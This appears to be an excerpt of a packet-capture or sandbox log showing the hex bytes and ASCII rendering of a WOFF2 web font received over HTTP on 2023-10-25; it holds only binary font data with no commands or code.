                                                                                                                                                                                                                                                                                                              Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC890INData Raw: 7f de 38 5d 99 52 8e 03 64 d9 d2 10 cc ad db 60 d0 a3 52 da a2 42 18 d1 23 f2 a5 c7 88 2c 91 1c d1 31 52 19 55 4a 44 bd a4 62 83 60 a2 30 3c cc ad 7f 18 df 46 41 3d 05 a4 7b d4 a8 ad 81 15 b0 60 11 c9 1a 18 63 1b 1b d1 52 a9 80 55 79 ed bf f0 4a bc 6b f5 22 b5 6a f9 bf 4e b3 7b 77 9f 90 55 54 3c 0f 38 54 36 36 a4 f2 df 48 2c 0a a1 b2 46 48 84 47 53 1e 47 be 5d e2 d5 c1 eb d9 ce 8b 3f ab 54 f1 21 34 c6 07 38 18 1e ec 42 01 1d da 6c 9a 70 40 13 91 80 84 a2 dd 03 74 c4 6f f4 d4 0a 76 c1 e7 1f 62 bf 67 dd f3 3f f0 10 6d e2 1e 21 a9 25 0d 89 e9 1a a9 78 a8 0c 4d 43 31 4d b0 bb a1 ee ff ff bf ed ff e7 da 6b af bd 91 7d 29 03 1b 2b 4e 87 9c 8a ef 17 51 5f 79 53 b6 58 a7 31 31 61 13 8a c3 03 26 60 a2 0d 27 22 bc 78 5a 0f b7 3d 62 5e e9 ec bf 1e 69 44 96 e1 11 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: 8]Rd`RB#,1RUJDb`0<FA={`cRUyJk"jN{wUT<8T66H,FHGSG]?T!48Blp@tovbg?m!%xMC1Mk})+NQ_ySX11a&`'"xZ=b^iD}
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC891INData Raw: 1f 01 04 00 4e c1 f5 bf 6b 0e 56 c8 33 05 86 58 2d 52 24 82 8c eb 33 7d c5 50 3c ac 1c 0b c6 01 5e e6 9d 02 ee 6e 49 bd 4d 16 65 49 a5 7d e0 e2 4d 8b 37 2f 21 b9 73 e9 ba a5 eb 97 6e 58 16 6e 5b 3e 50 1b c7 99 da 90 b3 dd d9 e1 ec 74 76 39 bb eb 9b ea 9b eb 5b ea 5b eb db ea db 1b 50 ea 61 3a cc 86 f9 b0 48 7c b5 a1 48 65 aa d2 24 d5 39 fa 20 a7 99 e6 2c e7 b9 c0 0d e9 c8 96 f4 64 20 89 20 9d 27 cb 64 9d 6c 12 12 f3 74 91 9e a4 a7 e9 59 7a 9e 0a 3e 70 de 71 4e 39 ab 94 e5 55 d7 35 d7 75 d7 4d d7 2d 17 ae 2e b8 2f bb af ba 09 fd 5f cf 05 cf 45 0f 69 fe d9 77 ba ef 6c 1f 65 d5 e8 f5 a0 7f ea 22 9d 9a 33 d3 9d de 10 1f d7 49 9d 12 6b 87 7c c4 c7 d8 cb 3e f6 73 10 dd d8 b1 61 4f f6 c6 30 75 2b cd 1f e6 4f f3 74 a7 db f2 6c 99 b1 ee b6 3e d8 2e 6d d7 b6 39 fb
                                                                                                                                                                                                                                                                                                              Data Ascii: NkV3X-R$3}P<^nIMeI}M7/!snXn[>Ptv9[[Pa:H|He$9 ,d 'dltYz>pqN9U5uM-./_Eiwle"3Ik|>saO0u+Otl>.m9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC892INData Raw: f5 24 51 09 0b 11 a6 78 fa 59 94 18 84 5e a0 53 42 c5 0c 7f 67 85 8e a6 68 66 99 ae 0f 29 35 1b af 51 e1 2c 31 d7 a5 c5 2c 05 80 7e a0 1b 7b c6 b8 07 ae d4 4b 9f eb 7b fa 46 98 21 e6 6a df 4f 60 00 fd 63 55 08 74 65 71 79 46 3e b3 5d 7d e4 b2 ab 76 2a 92 17 a2 77 c8 56 cb 31 66 f2 a6 2d 8a 47 33 d5 1e 83 73 ac 52 c6 0b 07 9c e3 7e 80 1a 9b 8e 26 96 e5 12 2d 5c b1 58 9c 1e e3 0a 75 54 fe 4e d6 ca 1f 74 ce 58 07 af c2 6a c0 15 37 46 69 48 cd 4c 8d bb d8 bf 1b 27 1c ef b2 0a 93 de 38 31 47 3a 35 8e 29 8a 3c 90 25 9e 22 cf a0 73 6c 46 61 ed 44 62 d1 d8 d4 9f 2c 27 32 cd c8 7d 04 da 09 c0 57 64 1f 9b 79 b1 89 2e 62 72 87 f7 c5 b2 fb 52 c2 b2 c4 41 12 81 34 01 86 c7 66 67 ae 91 d5 d1 0d 67 33 5c 20 06 41 38 10 e1 cc a9 19 64 33 3f 2a 25 ab 11 e4 13 01 e9 44 ae
                                                                                                                                                                                                                                                                                                              Data Ascii: $QxY^SBghf)5Q,1,~{K{F!jO`cUteqyF>]}v*wV1f-G3sR~&-\XuTNtXj7FiHL'81G:5)<%"slFaDb,'2}Wdy.brRA4fgg3\ A8d3?*%D
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC894INData Raw: cb 71 4c f4 8c 33 77 da 25 da 63 07 ad e1 de 82 b6 8e df 8f 3a 44 1f df a9 a8 ea 29 1f 69 c1 ea 5d 12 23 f5 74 bb 52 7a 0f e3 0c 47 d5 85 45 bf ee cb dd 3d f9 4f a8 0f fb b1 af cf ef c3 46 aa 59 75 b5 f3 57 d6 e3 9e 0a ea 78 a9 52 ec 78 66 51 91 79 05 58 c9 89 0d 0c b8 f3 2a 1b 5f 87 36 96 3a 9c 8e 3d 0b 4f 61 49 fa 68 1b 6a 5a 23 f3 e5 dd 60 66 fc 46 70 8e 49 f8 62 28 69 c3 fb 51 d3 4f c2 d6 1a 4b 5f 08 da c9 b3 ed dd c8 fd 38 13 a8 4b 76 63 25 de e8 d9 b9 4c 45 ae 2d 27 b4 4a 5e 82 d7 0c 36 c3 0d 16 89 18 9e 8c 5e 64 c9 8d ff bf 03 23 af 9f a1 bf dd 14 6f 3b b1 14 3d 02 b8 31 cc 60 52 75 5e 7d 4c 27 1e da a5 e0 70 33 97 f3 b6 49 38 86 f6 8e 42 bd 7b 28 a4 ae 52 b8 4c 7b 3b 08 5d 48 16 de 5c ea b8 d2 5a 1e 85 94 34 75 e8 49 d3 5e 26 60 bf a5 86 5b 4a 69
                                                                                                                                                                                                                                                                                                              Data Ascii: qL3w%c:D)i]#tRzGE=OFYuWxRxfQyX*_6:=OaIhjZ#`fFpIb(iQOK_8Kvc%LE-'J^6^d#o;=1`Ru^}L'p3I8B{(RL{;]H\Z4uI^&`[Ji
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC895INData Raw: f3 6e 5f b0 44 df 90 83 fa a1 8d 6e d6 7e ed 2e e3 f2 e7 40 33 3c c5 fd 41 af 5d 53 8e a8 49 da e7 f3 dd d8 a8 1c 35 6e e0 57 eb ca 68 db a7 61 37 b9 4b e0 4a 88 6a 2a 6a 21 1c 5e a8 a7 1f 6b 7b b8 9a 27 12 73 ad 1d 66 ce 39 56 51 ae 8d bb cd 98 aa b3 00 f9 c0 d5 2e 71 4b 8d e1 98 ed ab e2 1b 43 e0 ee 75 12 a5 a9 94 02 f6 25 bb 74 f6 3b 2c 66 b6 3f cc b6 25 df 95 b1 13 ea a6 f2 dd 95 f2 f1 5b 22 3f 77 dc 5e e4 1c 7b a6 29 b9 2e ca 88 76 65 87 89 f9 8b 27 10 ac 49 92 27 ea a7 cf c6 51 30 5f ca d3 51 a5 67 e0 88 f9 1c 57 33 f6 06 4c 41 98 f3 f5 b8 83 2e 6e 1f cb ab 72 f8 13 f4 30 fa 57 eb ee 0c f9 86 f7 5a ef 3d 51 8a d4 57 e5 d3 f8 b6 e0 a4 c7 ec 21 75 d4 b5 59 d8 c7 c2 bb 20 06 ee dc e7 92 37 2d 1b e1 de 58 7f 4c 93 b6 dc c8 6b a3 ce 59 5f c3 25 0b 9d f2
                                                                                                                                                                                                                                                                                                              Data Ascii: n_Dn~.@3<A]SI5nWha7KJj*j!^k{'sf9VQ.qKCu%t;,f?%["?w^{).ve'I'Q0_QgW3LA.nr0WZ=QW!uY 7-XLkY_%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC897INData Raw: e7 22 62 d7 2f 67 7b 55 b4 9a e0 f1 16 e6 d7 98 5c b4 c9 bf ae c4 d3 ba de 43 66 b1 64 e9 ec 0c fe 05 78 f7 79 d6 d7 86 b0 47 95 cc 2b b2 c5 b1 56 13 e9 4e bb eb c8 6a 0f 50 cb 58 79 51 df 8e c4 42 dc 78 07 aa 5f db 4d ae 6f de e6 e2 d7 22 78 55 96 82 5f 5d ca 0d 86 37 60 ed 45 3f 60 5c ba 73 a4 fd 38 64 f8 1c 89 e9 da 56 d8 f6 6a 88 9b 80 80 ab f1 5b 1f 9f 7b 81 9d b8 ce eb 7a ad e4 58 6f c7 c8 2d 21 f4 f6 d3 fa 41 eb cc 2b 65 fe 9c df d2 83 84 96 75 84 77 f8 35 c6 f6 3a 96 c2 dc 5d 40 53 8b 84 04 f2 b2 dd f5 c0 7e eb e3 42 9f 21 a9 ab bb fa 26 82 3d 33 d6 5b ed 88 92 5b ad 5d 2e 91 18 55 1e c8 c6 4e da 1b d9 cb 26 73 d3 28 c3 28 43 f4 ec af c5 52 78 6c f6 76 53 be 87 e8 22 7e 65 23 ab fa c5 0a 96 ec a7 d5 45 4c 1e ba 59 30 8f 71 e0 45 cd 17 36 9d d7 1b
                                                                                                                                                                                                                                                                                                              Data Ascii: "b/g{U\CfdxyG+VNjPXyQBx_Mo"xU_]7`E?`\s8dVj[{zXo-!A+euw5:]@S~B!&=3[[].UN&s((CRxlvS"~e#ELY0qE6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC898INData Raw: bb f0 bd ea a7 af 58 17 66 61 8f c3 72 2d 90 f9 82 9b 82 d7 f4 1e 6a 71 a1 00 44 9b be ce 11 17 40 ca ce ec ee 71 e0 b1 d6 9b fd e2 d5 26 c3 ad 23 fd cc 17 ce 3a 1e 12 ba 5b 6a 35 01 ef 74 50 9a 9e ea c3 3e 33 aa d2 4e ce 7e f6 d1 d0 05 f0 e1 e5 32 fe 08 eb b6 7f 95 7a 72 2a 33 5d f9 78 9f 1d 5d 03 fc f7 e6 a8 d5 32 d3 15 04 12 fb 39 20 85 b5 b7 9f c1 65 b7 d5 dd a8 de 62 7b c6 b4 7e 7e ce 43 70 c2 13 88 e0 e2 98 59 a6 a3 65 cf 65 5c 45 38 c6 3d 3c ed 15 14 f9 c8 29 55 b8 4f fc d9 9f 62 f8 21 f9 23 25 da f3 c3 a3 32 5d 7b 51 3d 5f 39 fa b9 b4 ad a3 9b de f8 61 5f 61 6b 86 87 f4 a2 81 98 a2 50 cc 25 33 e5 8f 56 7d 43 49 83 63 2a e6 64 47 14 f2 a9 66 1a c6 70 4b 5f 89 93 f1 d9 dc 5e 6c 97 2d 97 98 fa f9 89 93 e2 ee 78 43 e1 f8 8c 32 f2 52 b9 28 d4 a6 32 9a
                                                                                                                                                                                                                                                                                                              Data Ascii: Xfar-jqD@q&#:[j5tP>3N~2zr*3]x]29 eb{~~CpYee\E8=<)UOb!#%2]{Q=_9a_akP%3V}CIc*dGfpK_^l-xC2R(2
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC899INData Raw: cc 6d 50 03 1f b4 ab a9 27 27 87 21 22 6e 5b 71 6c f5 ea 24 d2 0b 14 1a 06 f6 61 f8 8e e5 11 10 51 a1 46 83 16 1d 7a 0c 18 31 61 c6 82 d5 3d 6c d8 71 e0 c4 85 1b 8f fb 1e 7a e4 31 5e 7c f8 09 00 a1 08 04 6a 98 d5 0c 14 c1 04 a0 10 ac 22 20 49 74 a6 b1 b8 4c b9 e9 27 26 5f ab 34 ef 04 bc 2f 26 a1 82 f5 06 f0 1d 36 1a 0f 66 1f ce 42 22 62 12 52 32 72 0a 4a 2a 6a 1a 5a 3a 7a 06 b5 8c 4c cc bb 15 28 53 a2 48 9d 06 4d b0 5a b5 eb f4 12 4e 8f 3e 03 05 b1 b2 b1 ab 53 af 81 43 e3 0b 4a 1f cc 18 b1 e2 c4 c3 48 90 28 49 32 08 5f 95 22 55 9a 74 19 b2 e5 c8 95 27 5f e1 bc fe b3 ab 5a 8d 36 ed ba e0 74 eb 31 61 da 8c 35 eb 36 6c da b2 6d c7 ae 03 87 8e 9c 38 f5 ce a5 19 b3 e6 cc f3 04 35 b3 b0 b4 cd 86 ed 76 d8 69 17 89 4a a3 f3 33 98 2c 41 21 b6 b0 88 47 91 d7 a4 a8
                                                                                                                                                                                                                                                                                                              Data Ascii: mP''!"n[ql$aQFz1a=lqz1^|j" ItL'&_4/&6fB"bR2rJ*jZ:zL(SHMZN>SCJH(I2_"Ut'_Z6t1a56lm85viJ3,A!G
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC901INData Raw: fb d8 0d ed 9e 85 1d 5c ba 41 df 9c a5 d1 5f a0 4f 00 f8 77 07 00 14 ab 01 c9 94 20 7c 34 35 6c 42 4a ea 51 5c 00 c2 c4 00 40 98 39 ba 06 40 58 1a 96 00 10 d6 46 00 2d a9 25 8a f7 da 3c 2a a3 c6 07 bd 23 ea 19 88 7a 47 44 a5 e1 50 e7 6f 44 3f 15 d6 f2 61 ef 15 7d 9d 29 48 8b e9 34 9c 95 72 15 cd f4 b4 0b 11 78 00 a3 4f 28 71 8b ec 27 9f f2 63 e8 59 22 0d e5 23 b2 63 bf db d9 36 10 04 44 f4 98 3c f4 88 00 61 b2 14 28 c1 2a 43 7c 1c ee 10 90 d1 3c bc 92 87 d6 7d 61 34 aa d5 a4 bc d4 7e fa d8 03 69 6e c2 da a3 66 6f cf b5 c9 14 7c 70 4c b4 3f 16 76 28 d8 78 1e e2 c8 c3 db c3 b9 5d bd 3a 0d 2a bc d5 5f 50 d7 da a8 25 ef ee 7a 95 72 7f 17 f7 a8 f8 66 33 a8 b7 34 1a 88 9d 4a a5 7f da d5 0a 78 12 be 37 07 82 82 03 f3 57 85 84 d4 2b 00 1c 18 0f 5d 54 95 c8 98 28
                                                                                                                                                                                                                                                                                                              Data Ascii: \A_Ow |45lBJQ\@9@XF-%<*#zGDPoD?a})H4rxO(q'cY"#c6D<a(*C|<}a4~info|pL?v(x]:*_P%zrf34Jx7W+]T(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC902INData Raw: eb 3b ba 6b bc 36 0e e3 c3 81 45 0f 2c 81 85 0b 5e af 6b 91 c5 af 1c 02 d5 98 a9 75 4f 77 45 b1 ec df db 7c 42 b8 d7 78 9c d5 40 7f 10 da 19 43 41 fd 8d 32 2c 94 31 b2 82 11 f8 1f 59 dc 28 33 c9 af bf 88 5b bb 07 be c2 ba cf 7c 52 c0 3c e5 da 57 15 c7 d2 d8 88 e6 68 0a 87 85 c2 70 6e 14 c1 25 78 81 23 86 2c 05 ce 07 d1 3b 58 68 7f 95 40 83 5f 30 ce f7 4d 00 0c d3 f3 e7 e8 67 8c 0b c5 73 fc 04 6d b8 2b 77 a6 5c db 2a 85 1a 62 c9 06 47 a7 8d b3 1a 5d fd a4 2a 51 5d 88 52 24 a9 74 78 a2 b2 ee 6e d4 05 73 9b d4 26 38 6b 68 8a 7b e0 58 d9 e4 b9 79 75 b8 ae 62 1c 20 10 58 8c b6 39 38 85 cb df 46 74 ac d0 02 13 e7 de 7a 7a 5a 47 b4 49 4b 93 0a 4a 09 e7 93 42 da d5 20 e4 74 f6 6a 27 54 e1 be 9d de 3d 15 fb b7 c3 95 a7 ae 6d 34 39 65 7b f1 e2 8e ef bd d9 e0 d6 1c
                                                                                                                                                                                                                                                                                                              Data Ascii: ;k6E,^kuOwE|Bx@CA2,1Y(3[|R<Whpn%x#,;Xh@_0Mgsm+w\*bG]*Q]R$txns&8kh{Xyub X98FtzzZGIKJB tj'T=m49e{
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC903INData Raw: cb d9 85 c9 7f b4 61 95 58 7a 69 66 38 b9 50 6c ba b9 59 17 a8 39 1f 9c b7 0f 37 63 96 b1 24 0d c1 91 6b 67 38 4f 55 91 67 b0 c9 33 d9 70 34 56 f1 5c 2e c3 b3 fb 7e 0b 58 e9 10 af 48 ed 86 1f c9 91 5e da 76 10 44 3f 49 f0 53 48 0c f1 c5 88 ae 37 b3 c7 22 70 29 65 ea d2 17 9d 02 51 5f 84 e2 e5 bb f0 50 ba 1d 19 93 1d 47 8f 4f 3f b7 5f 77 21 e9 47 17 f1 8f c8 56 6c 35 c5 09 47 09 ac 2c 56 17 a4 fb d9 9d e6 34 1f 3e 13 d1 8c c7 c3 c5 a7 06 3b f5 7c 9f 86 bc c7 1c 15 45 c6 ec 87 a3 93 20 3f e1 cc d9 5b f8 f6 97 6e 56 8e 64 57 ee 3a 1c ab 7f f3 c2 59 3c 7b 5e 49 ec ae f0 cc 85 5d 02 34 75 ec 11 89 b7 48 c1 8d 75 2c 19 be 9d 9d 03 99 db 5b d4 e0 ca 58 b5 b4 96 42 76 a1 a7 62 8f 71 a3 8e da 77 ad d8 70 03 01 7f 7b e3 7c cf dc 6d 19 95 b1 82 9a c0 49 35 d4 ca 02
                                                                                                                                                                                                                                                                                                              Data Ascii: aXzif8PlY97c$kg8OUg3p4V\.~XH^vD?ISH7"p)eQ_PGO?_w!GVl5G,V4>;|E ?[nVdW:Y<{^I]4uHu,[XBvbqwp{|mI5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC905INData Raw: 53 ac df 3b af d8 90 78 7e 8e 3f 47 94 e9 7f ca a5 7e 3b 17 62 9b 0e 39 1d a6 c3 ef 71 7a 17 cd 83 2c d0 74 78 d0 e7 3b d0 03 20 be 27 fc 57 92 75 d7 2e 1f a0 9c fe 59 5f 75 a3 6a c9 e0 40 ef c9 5e 65 e0 e7 55 c0 f2 3d f5 83 35 95 5d 7d cd ee 3d 5d 89 81 36 c3 81 87 dc ae ad 4d fe 55 e3 58 33 b0 cc d7 ee 3f f9 83 6c b2 af 6e 07 20 f8 b7 ce 70 b5 f3 4a 3d 71 c0 2d 18 47 8e 43 dd 18 a2 bc 8a d7 dd 68 15 f6 d2 b2 58 6a 08 d2 7e d9 bf 53 77 90 29 1e 65 cb 88 3e 17 63 1c 36 5e ec 22 11 2d 2c ed 5c fb e0 c8 95 f1 c8 fe fa a8 d4 13 e0 06 8a 05 ae 07 b0 f5 4e 00 5b ff ca 68 6f 04 d0 1f 50 37 51 db 63 ae ab 3a f2 40 f6 fb 6c d3 41 a7 c3 7c 68 b8 ea da 47 e5 bb c9 f3 27 a0 19 34 1d e9 f7 f9 0e 74 83 33 fe ff fe 1d b3 d4 3d 4a de 45 b8 5a 23 f1 5c 3b fa f9 63 cf 26
                                                                                                                                                                                                                                                                                                              Data Ascii: S;x~?G~;b9qz,tx; 'Wu.Y_uj@^eU=5]}=]6MUX3?ln pJ=q-GChXj~Sw)e>c6^"-,\N[hoP7Qc:@lA|hG'4t3=JEZ#\;c&
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC906INData Raw: 3b 9c d7 fb ac 17 8e bc df 25 ea 55 ce ea 68 bb e9 3a 15 cf 7a 45 07 b0 ef cd 00 f5 3a 46 79 65 c2 51 dd 52 a0 80 e6 25 3e 3a 2a 3a 26 b2 97 47 79 34 16 a9 a0 a7 45 31 d1 91 57 df ed 40 61 38 cc 99 1c 03 78 78 9e df 87 b1 e7 1c e6 99 08 88 04 16 b0 fe 42 36 22 39 e6 bf e8 a8 9f 78 60 1c a9 b3 1c 29 1e 96 50 03 60 f3 48 68 48 62 d4 3d 4e ae 3b 3c 34 d0 68 32 66 15 1d 0d 9e d8 bc 33 b2 42 3f 3d ed bb 6c b8 c0 b0 4c d6 26 d6 17 8e ac d4 cf 7c 92 21 47 5a 01 d5 f7 52 74 f8 90 78 21 be 99 65 92 a9 c9 e7 4d 8f 39 2c 7e 11 87 0e 7f 0f d0 ed 70 9c 72 a5 58 58 b1 e1 cc 16 11 5f ee 93 c3 f7 4a c4 f0 fd 3e a5 8c d3 2e 8a 63 71 62 b3 6d 67 9d 8e 96 a3 2d f4 8f c2 bc bc f7 71 0e f0 6f 11 a1 2a 12 57 a3 ef 09 cc 09 3c 45 8b c5 26 23 44 55 77 f1 f9 60 8a 04 48 04 c9 19
                                                                                                                                                                                                                                                                                                              Data Ascii: ;%Uh:zE:FyeQR%>:*:&Gy4E1W@a8xxB6"9x`)P`HhHb=N;<4h2f3B?=lL&|!GZRtx!eM9,~prXX_J>.cqbmg-qo*W<E&#DUw`H
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC907INData Raw: d3 8e 89 43 a9 1c 93 53 8e 19 0c 90 f1 19 00 3a fd 3b 9b 06 6c 44 9c 5a 4f d4 a3 70 15 59 29 50 38 ad b4 86 00 55 e0 1b 8f 8f 8e da 8e 2a 84 ef d7 1c 72 1c bb d2 7c d4 2b b6 0a c9 a5 05 34 1a 92 8a 2c a0 96 62 71 02 5d b9 0e 83 a3 16 63 d9 64 8e 4a 9f 17 2b d9 e7 da 02 f0 ae 45 3e e1 48 79 2b 10 9f 92 46 29 fa e5 24 0b f4 34 6a be a1 07 e0 fe 6b a9 d6 2e fb ca 2d f1 8a aa 3e 9a 20 37 48 7b 8b ec 91 45 d4 6f 28 54 9c 95 06 ec 4c ab 8f 00 2e 35 da 3d 53 73 37 78 f0 80 76 2b 2d 9e 56 ff 3a fd 49 13 db dc 96 e6 27 9e bc 34 25 df f9 60 19 0f b7 4d 76 c9 15 5a 31 b9 56 0c 08 4c 51 dc bf d2 5b 96 a4 f3 5e a5 3b 41 8b 51 b6 59 06 28 62 be e0 a2 8a f2 7a b4 df 98 f5 63 fa 53 da 79 ef d1 35 ee e6 79 06 a1 95 a5 d8 7c bc a5 a5 9b c2 ae a8 c7 94 db 49 24 9e a0 7a 74
                                                                                                                                                                                                                                                                                                              Data Ascii: CS:;lDZOpY)P8U*r|+4,bq]cdJ+E>Hy+F)$4jk.-> 7H{Eo(TL.5=Ss7xv+-V:I'4%`MvZ1VLQ[^;AQY(bzcSy5y|I$zt
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC909INData Raw: 71 19 56 09 55 e1 ca 1a 95 56 f5 dc 79 0a 60 f8 9e 1d f5 13 37 f7 4f 5c 8f d7 b1 02 9a 78 56 5f d7 b4 a4 11 09 ce 41 df e8 76 04 b0 00 fc ab 3a 37 30 20 21 c2 df c5 2f 45 31 fd 2a d6 8f 9a 22 0a f5 4f ca 21 4b bc e6 3b 3b 88 65 c1 c3 98 86 0d 03 c1 b2 dd ce 24 5f df 5f 80 48 5f 85 7d 88 7e 69 13 17 f1 35 fe 0d c2 4f 5d 66 92 21 14 df b7 a2 23 87 91 37 f0 e2 d0 b7 c8 27 4b 2c fc b1 7c 29 56 4e ef c6 ec 10 c9 c8 95 24 51 b5 e8 09 aa 79 c4 e2 c6 66 6b a1 c6 51 4f eb 3f cb 6e 9f e7 4b de cc 82 aa 4a ad b6 f2 c3 11 bd 52 b3 8e 01 92 49 a3 66 13 ee dd 86 7a 3e 0a 1d 5e 9d 8d 46 67 ff af 84 cf 42 a2 ec 28 60 50 a9 d7 91 2a 43 a8 b4 ec ca 4a 9d 92 45 43 e7 64 66 c1 e0 59 19 30 64 56 26 0c 61 be f7 22 c0 09 d1 55 62 6a 5c 74 21 d5 e0 2b 1c 89 f6 c5 53 b1 28 84 96
                                                                                                                                                                                                                                                                                                              Data Ascii: qVUVy`7O\xV_Av:70 !/E1*"O!K;;e$__H_}~i5O]f!#7'K,|)VN$QyfkQO?nKJRIfz>^FgB(`P*CJECdfY0dV&a"Ubj\t!+S(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC910INData Raw: 00 de ec 79 20 cd 42 40 80 08 1e d0 0f 37 07 46 2f c4 f8 2f ce 0a c8 ce 32 a8 f0 ba 1f 50 f3 8b fe b2 47 f5 ab f4 72 60 dd 2f 3a 6f 7c 20 1c eb 8b 8a 1d 68 da b8 38 9a 61 a4 b4 77 d3 6c 5b 2b 18 78 f5 da 7e e5 b4 77 1e c3 3e f0 61 4f 19 33 ee ff 76 ef b7 ee b0 ab 8c 3a d7 13 0f 9e d4 f4 30 56 49 43 13 8c 89 8c 34 d9 38 28 82 e7 bc 6a 36 7e 20 fc d7 16 9c f9 b7 71 fb 75 fc 80 6d 1f dd 34 84 3c bb e5 96 25 7b cb 4d d5 73 d1 6d 3f c3 6a 35 0c 68 a8 87 a3 9f 3a c9 62 9e c8 5e fa d5 3a fd 80 9a 76 24 fa 89 93 34 e6 69 ba 57 3f 4b 4f e8 68 50 0c 9d e4 5f 55 5c 05 2e 3f e4 56 38 a0 f8 aa 60 26 48 3a 54 67 4b c8 d4 db 13 3a a8 ce 4a 28 6d 84 61 44 78 a5 f1 b0 28 65 09 08 bd c5 fc 76 31 8a 29 fc 82 98 09 92 ce 80 82 b6 54 25 8f 72 65 3f 2a 45 a4 f7 a5 77 80 84 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: y B@7F//2PGr`/:o| h8awl[+x~w>aO3v:0VIC48(j6~ qum4<%{Msm?j5h:b^:v$4iW?KOhP_U\.?V8`&H:TgK:J(maDx(ev1)T%re?*Ew,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC911INData Raw: 13 12 2c cb a9 84 a2 12 25 b4 2b b7 43 4b f2 b8 8f 4e 0e 8b 40 91 38 41 4f c9 8b db 09 93 93 18 37 50 a6 58 dc b5 e2 60 25 59 29 d6 a4 12 73 8c 1f 39 fd 7e 4e 3a 4a 6b eb 01 f4 93 17 41 2c 3a c9 0e 84 58 91 05 2b 0e d6 a4 12 33 78 24 9b c5 6f 2d 02 ac 1c 8b 3e 2e 15 8b a9 38 2b b5 6c 03 db 78 ca 49 be 89 ac a5 54 c0 97 bc b0 f9 fa b1 14 d6 d2 bf d1 b2 4a 18 0a c7 3c f9 dd 9f 6a f6 ed 8e b4 a7 16 2a be fd 32 35 7c fd a9 68 92 c6 f1 c6 c5 ed d0 32 3f 29 31 09 69 04 f3 1d 78 06 60 c1 74 57 c6 b0 91 2d d5 fb 64 d4 59 2a fc 64 1e 87 a9 64 2b 18 86 39 6c eb c4 33 b5 08 49 ae e2 b8 c2 0b a9 05 db c0 36 b2 93 6c 72 a5 88 58 d6 f2 94 38 f6 a3 61 88 93 97 c1 7e cb 2e 3e 54 d7 53 49 64 55 a5 02 06 20 b7 9d 2a 38 00 7f b1 68 e6 32 ae f0 39 17 90 a8 01 75 af 2b 03 e0
                                                                                                                                                                                                                                                                                                              Data Ascii: ,%+CKN@8AO7PX`%Y)s9~N:JkA,:X+3x$o->.8+lxITJ<j*25|h2?)1ix`tW-dY*dd+9l3I6lrX8a~.>TSIdU *8h29u+
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC913INData Raw: 8e 9b 38 9b 6b 18 c7 93 7c 9c af b3 23 be c2 9b 8c 88 8c 8a 50 45 26 36 69 97 12 69 95 61 59 7a 4e bc 31 b9 b0 0f 7c 1d 79 97 ef e1 9f 57 50 fb a7 fe 96 bf ff 5f fe 67 63 5d 21 b0 59 b0 45 95 e4 4a 99 a2 a3 a2 bf 62 b4 e2 83 8a 5f c2 92 30 14 d6 82 4f e0 73 57 c4 ad 80 ac 18 1c 05 8a 9a 26 80 83 03 d0 00 26 b1 21 84 10 e7 e5 da 3e 47 47 51 c8 d2 36 80 fd fb ab af e6 45 94 b4 89 6b 0f bf 0c e2 20 82 e2 14 89 7e 31 2e 47 1a e7 bf 1c 96 d6 0d 60 81 ff bc 2e d8 8a c6 e8 81 08 7f 54 44 1f 8c 3c a4 ef 96 ef 69 cd f2 c0 33 1c d0 9f 80 0c f0 59 f4 69 75 0f ba 63 bd ec 2d c6 fc 6a 5f d6 82 12 94 24 e6 c8 e4 f1 80 eb a5 1d 46 ae f4 a2 44 57 29 db 8d f1 3b 10 40 21 a9 05 2b 05 de 6a 3d c5 5e 25 07 b9 d3 f1 b4 b9 27 ba 50 e8 40 5f 6b fd e6 87 76 64 f6 3d bf 1a 52 7e
                                                                                                                                                                                                                                                                                                              Data Ascii: 8k|#PE&6iiaYzN1|yWP_gc]!YEJb_0OsW&&!>GGQ6Ek ~1.G`.TD<i3Yiuc-j_$FDW);@!+j=^%'P@_kvd=R~
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC914INData Raw: 9f 07 86 c8 0a b6 c1 0e 7a c6 98 e0 83 3d 1d 4b 53 86 74 29 a2 ce 6e 30 ef c7 2a aa f5 62 23 00 c1 14 81 0b ed e6 ca 72 66 2d 37 16 a5 3f 13 c3 8e 56 e4 f4 68 77 6b 15 8e 30 bb 3b 80 5c a6 86 fa a3 11 e4 51 99 d3 c5 b9 0b e0 4b 2b 15 b7 51 61 52 8b bc d3 d3 ed 2b 12 64 f2 1b 08 af b8 0a 05 98 e3 fe 32 37 c0 27 44 a3 7f ed bd f2 90 d8 4a a6 0e 51 00 c1 ff f6 41 ed 79 9f e9 b3 4b 11 80 7a d3 1f 74 21 f0 34 90 eb 99 7f 56 d9 28 e5 0d de 90 c7 83 d5 e9 b1 fd 09 90 00 be 57 b6 91 99 a7 67 46 e8 e7 68 2c b1 85 81 82 94 15 79 83 f4 60 99 55 ea 8e fe f5 0c 03 77 9a e9 b2 d8 bd 28 37 9b fa f9 fc 73 f3 3f bf 87 3e ec 7c c4 32 82 f8 dc 6c 16 74 a0 11 ed 2e bc e8 8f 25 d0 a4 88 4c 24 46 74 41 dc a5 fe a9 05 78 b4 8c 66 9d d9 4a 1c 78 e9 0b 36 c0 fe cb ce 43 90 5f 47
